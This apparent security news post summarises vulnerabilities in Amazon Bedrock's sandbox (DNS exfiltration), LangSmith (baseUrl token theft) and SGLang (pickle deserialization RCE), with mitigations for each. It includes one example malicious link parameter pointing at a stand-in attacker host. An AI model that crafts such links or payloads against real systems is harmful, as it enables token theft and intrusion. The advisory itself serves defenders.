AI Platforms Under Siege: DNS Tunnels, Token Theft, and Pickle RCE

Artificial intelligence platforms are rapidly becoming the backbone of enterprise innovation, but recent disclosures show they are also emerging attack surfaces. Researchers have uncovered flaws in Amazon Bedrock AgentCore Code Interpreter, LangSmith, and SGLang that enable data exfiltration, account takeover, and remote code execution (RCE).

Amazon Bedrock: DNS as a Backdoor

  • Issue: Sandbox mode permits outbound DNS queries despite “no network access” configuration.
  • Impact: Attackers can establish command‑and‑control channels, exfiltrate data, and even obtain reverse shells.
  • Risk multiplier: Overprivileged IAM roles could expose sensitive AWS resources like S3 buckets.
  • Mitigation: Migrate workloads to VPC mode, enforce DNS firewalls, and audit IAM roles for least privilege.

LangSmith: URL Injection and Token Theft

  • CVE‑2026‑25750 (CVSS 8.5): Lack of validation on the baseUrl parameter allowed attackers to steal bearer tokens, user IDs, and workspace IDs.
  • Attack vector: Social engineering via crafted links (e.g., ?baseUrl=https://attacker-server.com).
  • Impact: Unauthorized access to trace history, SQL queries, CRM records, and proprietary code.
  • Mitigation: Upgrade to LangSmith v0.12.71, validate URL parameters, and train users against link‑based social engineering.

SGLang: Pickle Deserialization RCE

  • CVE‑2026‑3059 & CVE‑2026‑3060 (CVSS 9.8): Unauthenticated RCE via ZeroMQ broker and disaggregation module using unsafe pickle.loads().
  • CVE‑2026‑3989 (CVSS 7.8): Insecure deserialization in crash dump replay utility.
  • Impact: Attackers can send malicious pickle files to trigger arbitrary code execution.
  • Mitigation: Restrict access to service interfaces, segment networks, and monitor for abnormal child processes or outbound connections.

Strategic Takeaways

  • AI sandboxes aren’t immune: DNS resolution can undermine isolation guarantees.
  • Observability platforms are critical infrastructure: LangSmith shows how developer‑friendly flexibility can bypass guardrails.
  • Open‑source frameworks need scrutiny: SGLang’s unsafe deserialization highlights the risks of rapid innovation without secure defaults.

Final Thought

These disclosures underscore a new reality: AI platforms are not just tools, they are attack surfaces. As enterprises embed AI deeper into workflows, defenders must treat them with the same rigor as traditional infrastructure — enforcing least privilege, validating inputs, and monitoring for anomalous behavior. The future of AI security will hinge on balancing innovation with resilience.

Be the first to comment

Leave a Reply

Your email address will not be published.


*


This site uses Akismet to reduce spam. Learn how your comment data is processed.